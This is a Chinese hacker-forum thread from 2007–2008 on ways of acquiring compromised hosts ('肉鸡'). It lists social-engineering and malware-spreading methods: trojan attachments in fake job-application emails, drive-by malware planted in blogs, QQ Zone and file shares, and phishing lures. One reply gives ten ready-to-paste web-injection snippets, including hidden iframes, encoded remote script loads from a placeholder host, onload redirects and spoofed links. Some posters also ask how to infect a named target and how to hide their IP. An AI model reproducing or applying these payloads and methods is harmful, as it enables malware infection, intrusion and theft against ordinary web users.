[讨论]得肉鸡的艺术
议题作者:别动我飘着呢信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
(根据黑客行为特征可有以下几中表现形式:
1.恶作剧型 喜欢进入他人网址,以删除某些文字或图象,篡改网址主页信息来显示自己高超自娱或娱人,或者进入他人网址内,将其主页内商品资料内容,价格做降价等大幅度修改,使消费者以为该公司的商品价格廉价而大量订购,从而产生Internet定货纠纷。
2.隐蔽性攻击型 隐蔽在暗处以匿名身份对网络发动攻击型行为,往往不易被人识破,或者干脆冒充网络合法用户,侵入网络‘行黑’,该种行为由于是在暗处实施的主动攻击型行为,因此对社会危害极大。
3.定时炸弹型指的就是网络内部人员的非法行为,他们在实施时故意在网络上布下陷阱或故意在网络维护软件内安插逻辑炸弹或后门程序,在特定的时间或特定条件下,引发一条列具有连锁反应性质的破坏行动,或干扰网络正常运行或致使网络完全瘫痪。
4.矛盾制造型 非法进入他人网络,修改其电子邮件的内容或厂商签约日期,进而破坏甲乙双方交易,并借此方式了解双方商谈的报价价格,乘机介入其商品竞争。有些黑客还利用政府上网的机会,修改公众信息,造成社会矛盾和动乱,严重者可颠覆国家和军队。
5.职业杀手型 此种黑客一职业杀手著称,经常一监控方式将他人网址内由国外传来的资料迅速删除,使得原网址使用公司无法得知国外最新资料或定单,亦或者将电脑病毒植入他人网络内,使其网络无法正常运行。
6.业余爱好者 计算机爱好者受到好奇心驱使,往往在技术上追求精益求精,丝毫未感自己的行为对他人造成影响,属于无意性攻击型行为。这种人可以帮助某些内部网堵塞和防止损失扩大。有些爱好者还能够帮助政府部门修正网络错误。因此,这类黑客的出现并非是坏事,至少他们的本意无反社会的色彩,只是受到好奇心驱使而已。)此段内容来源网络,非本人总结和原创,澄清一下~:)、
不管那种,几乎都离不开得肉鸡的目标,现在网上得肉鸡的几种方法,本人做了一下终结/:
1。根据WEB漏洞,服务器漏洞,得服务器肉鸡,网站挂马等/`
2。以求职信的方法得肉鸡,谎称自己 是某公司设计人员,附件添加木马或信中穿插木马页面,带有很强的目标性。
3。利用现在网上提供的免费的个人BLOG,个人站点挂马,因为这些服务几乎无一例外的有跨站漏洞和可执行用户添加的代码,(如黑防看到ZYH的中国博客网就存在典型的跨站漏洞)
4。QQ空间挂马,原理同3一样~
5。网上提供免费的网盘,如大名顶鼎的G盘,可以让别人免费共享你的软件,绑后门是最常见不过的,跟在大型黑站绑后门一样的,给自己的作品绑上一个后门,虽然可行,但是贬低了自己的人品,本人觉的不适合做人的基本准则。
6。群里有共享,垃圾群,我就喜欢绑上木马后走人,当然信息要有敏感性和诱惑性,骗对方打开才是上上策
7,最近QQ挖掘鸡好像用的人很多,利用站点多设置一些敏感字,制造钓鱼平台,关键字段含有/QQ。TXT,诱骗用户通过搜索引擎浏览你的站,中招,总结就是利用现在目前流行的敏感信息构造
钓鱼平台,或者是漏洞,这个跟钓鱼站点送5-6位QQ号发送给你的好友的号码的原理是一样的,思路是这样大家可以自己构造。
8,各大搜索引擎都有自己的贴吧,给那些寻求帮助的人发送虚假信息
(挂马的站点,再跳转真实站点,这个在代码里不难实现吧),论坛里有好多支持代码执行的论坛,典型的是BBSXP,这个在FTP空间论坛里可以看到~~~
我暂时就想到这些,藐似一个方法,都是骗人~~~
PS:我超级菜鸟,欢迎藐视我,HOHO 总结得不错··[s:39]
还有影视MTV嵌入挂马
BT传播
多着呐………… 可以在肉鸡上下载 BT,剩着本机的资源,呵呵~ mdb挂马,doc挂吗,txt格式挂马还米听过 哎,方法是不少,
但是得了肉鸡又怎么样...
好像没有太大的利用价值..
难道去攻击服务器?..
呵呵,我是不会做那种无聊的事情..
PS:我也是菜鸟. 楼上说的藐视可以用迅雷的注册账号(达到上校的登记可以发布软件或者游戏什么的,)感觉跟挂马在迅雷首页没什么区别~~~~~~~~~ 我是个业余爱好者,还要和你们多学习,这些得肉鸡的方法我都没有试过 [quote][b]引用第5楼[i]无敌小龙[/i]于[i]2007-01-18 14:17[/i]发表的[/b]:
mdb挂马,doc挂吗,txt格式挂马还米听过[/quote]
TXT也能挂马,第一次听说? [s:66] [quote][b]引用第12楼[i]hallz[/i]于[i]2007-01-20 23:30[/i]发表的[/b]:
说白了就两个字
利益[/quote]
呵呵``
抓肉鸡的方法太多了``
我们活在技术的世界``
不能沉溺于去抓肉鸡`
当然利益的吸引也是很大的``
- -``这就需要定位好了!
`````hack≠creak!``
HOHO```
多申请点大论坛```然后可以上传附件的的啊``
去把鸽子传进去``
哈哈!`````````
[s:35] TXT确实可以挂``
只是这种技术好象被高人利用``
我是只菜鸟`
不晓得哈```
如果上天可以再给我一次机会`
我想大声的说``TXT怎么搞马啊```````````````````````````
别动我!!!!!!!!!!!!!!老娘我飘着呢```````````` txt真的可以挂马,今天我卡吧就杀到了这种马
不相信的大家可以去下载 那个 “看雪论坛。。。。。的技术总结” 我下好了,卡吧就跳出来了,说是 。。。。TXT是木马后门,当时我就晕了,这种格式也好挂马,那岂不是要天下大乱了? [quote][b]引用第8楼[i]seaven[/i]于[i]2007-01-19 22:15[/i]发表的[/b]:
TXT也能挂马,第一次听说? [s:66][/quote]
TXT可以用来挂马的..以前在讨论版块里也讨论过这个问题,
QQ木马反击站里,这个贴里我也有提到过..
txt里加如html代码是可以当作html来执行的..不信就找个html的代码..然后改html后缀为txt上传空间里
照样可以执行. [quote][b]引用第15楼[i]fhod[/i]于[i]2007-02-03 19:24[/i]发表的[/b]:
TXT可以用来挂马的..以前在讨论版块里也讨论过这个问题,
QQ木马反击站里,这个贴里我也有提到过..
.......[/quote]
真的假的..txt可以在网页执行木马程序?
比如<iframe src="木马地址" width="0" height="0" frameborder="0"></iframe> 可以执行? [quote][b]引用第19楼[i]xh[/i]于[i]2007-02-05 20:48[/i]发表的[/b]:
你滴blog好像用了第3条“利用现在网上提供的免费的个人BLOG,个人站点挂马”艾。。。。[/quote]
报告楼上滴,首先可以肯定你一定是高手(现在不是以后一定是),其二,你很仔细,但是我跟冰冰说过,挂马,我测试一下效果,但是,那个马是无效的,大家可以仔细观察一下,或者坚挺本地的连接~~
无效的马,呵呵,加我的QQ,有礼物送你~~ [quote][b]引用第8楼[i]seaven[/i]于[i]2007-01-19 22:15[/i]发表的[/b]:
TXT也能挂马,第一次听说? [s:66][/quote]
三、js变形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀的。
冰,斑竹加钱吧~~~ 还不会 学习中 [s:41] TNND.现在挂马都强着呢.RM挂着.Q-ZONE挂着.XUNLEI挂着....真的.很不爽..动不动就中马.... 我认为是实际的扩展名字不是TXT吧!或者说伪装成TXT。 3。利用现在网上提供的免费的个人BLOG,个人站点挂马,因为这些服务几乎无一例外的有跨站漏洞和可执行用户添加的代码`,(这个我用得多)
8,各大搜索引擎都有自己的贴吧,给那些寻求帮助的人发送虚假信息(这个好象没用过吧。)
主要是BT传播 jpg 好像也可以挂马的? 挂马我的一点理解:一,在网上挂马,让别人访问然后马儿下载到本地执行。
二,让马儿在本地从一个文件中释放出来并执行(图标和名称可以任意取的)。那么这个文件应该是可执行的,或者有隐藏后缀,或者关联打开?
我是刚刚学习这些,不是很了解,请原谅!希望有高手指点。 以前下电影时候..有看过一种挂法..就是把两个电影文件..合并成屏保格式的文件...超强.....就是运行后全自释放出来...不懂这是怎么个挂法原理呀 有关TXT挂马,我还做了一个教程,
大家不懂的有兴趣可以看下
没什么技术含量……
[url]http://www.520hack.com/donghua/donghua1/200702/4724.html[/url] txt挂马其实就和把一张图片换了后缀,调用图片察看器打开,照样能看到图片一样......表面上看到的是txt格式的伪装......... [quote][b]引用第30楼[i]asm[/i]于[i]2007-03-05 03:54[/i]发表的[/b]:
txt挂马其实就和把一张图片换了后缀,调用图片察看器打开,照样能看到图片一样......表面上看到的是txt格式的伪装.........[/quote]
错,TXT挂马不是把一张图片换了后缀
而是把网页文件换了后缀…… 挂了马的txt文档还能运行吗?大家都说TXT可以挂马,是把HTM改成TXT,而里面的内部其实是HTM的,是这样的吗?我不理解这个,这样打开TXT后,还能把马下到目的机子上吗,没有其它设置的配合行吗?
大家别笑我,我是菜鸟一只,也是肉鸡一只,呵呵。 现在还有一个比较流行的吧... 就是FLASH 插网马 一打开 FLASH 就.......... 不明白,像百度、新浪这样的中国顶级门户的博客也能被挂马?哪位高手指点一二? [s:266] txt挂马法:
我想这个意思就是JS变形加密一种挂马方法吧
<SCRPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀,没错吧!
下面我就针对挂马方法发表下吧:
[quote]
一:框架挂马
<iframe src=地址 width=0 height=0></iframe>
二:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='
' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
三:js变形加密
<SCR
PT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马
<body onload="
indow.location='地址';"></body>
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe sr
="http://www.xxx.com/muma.htm/"></iframe>';
六:css中挂马
body {
background-image: url('javascript:document.write("
script src=http://www.XXX.net/muma.js></script>")')}
七:JAJA挂马
<SCRIPT language=javascript>
window.open ("地址","
,"toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
八:图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
九:伪装调用:
<frameset
rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高级欺
<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
<SCRIP
Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no
directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
[/quote] [quote]引用第23楼黑77于2007-03-05 22:26发表的 :
错,TXT挂马不是把一张图片换了后缀
而是把网页文件换了后缀……[/quote]
还好...不是加个后缀..
要不然..那叫什么.txt挂马.............[s:264] 我知道一个人的油箱 和QQ号码 可是对方警惕性比较高.EXE格式的东西不打开
他用瑞星杀软 那位老大能告诉我 怎么样才能给他种上我的马
这个人电脑里有我非常想要的东西.而我接触这个才2月属于白痴型的 求助啊! 总结得不错
值得学下,把大家提的每样都学会,灵活运用下就强了 其实没有那么明确的界限了
最多情况也就是钓鱼了和挂马了
但有时候两者有可以混起来说
29楼 -_—!!! [quote]原帖由 [i]fqzdn[/i] 于 2008-1-29 02:41 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=108401&ptid=26824][img]images/common/back.gif[/img][/url]
我知道一个人的油箱 和QQ号码 可是对方警惕性比较高.EXE格式的东西不打开
他用瑞星杀软 那位老大能告诉我 怎么样才能给他种上我的马
这个人电脑里有我非常想要的东西.而我接触这个才2月属于白痴型的 求助啊! ... [/quote]
学习的动机真强烈啊,
佩服死了:sweat: [quote]原帖由 [i]无敌小龙[/i] 于 2007-1-18 14:17 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=77239&ptid=26824][img]images/common/back.gif[/img][/url]
mdb挂马,doc挂吗,txt格式挂马还米听过 [/quote]
mdb.doc挂马应该是捆绑吧,TXT还真没听说过,个人感觉就是挂网马最好用 貌似迅雷挂马的效果很不错哦:kiss: *** 作者被禁止或删除 内容自动屏蔽 *** 从各位的讲法可知,大部分的“马”,都需要执行人的执行,不执行应该就可以避免,所以应该说好的伪装才是最重要的,有哪位可以介绍一下具体的应用方法?
回复 板凳 无敌小龙 的帖子
doc挂马应该就是利用office的漏洞吧;txt可以挂马,以前在X看到过。 搞个服务器作肉鸡 那就爽了 在寻找肉鸡的时候,怎么样同时隐藏自己的ip?
页:
[1]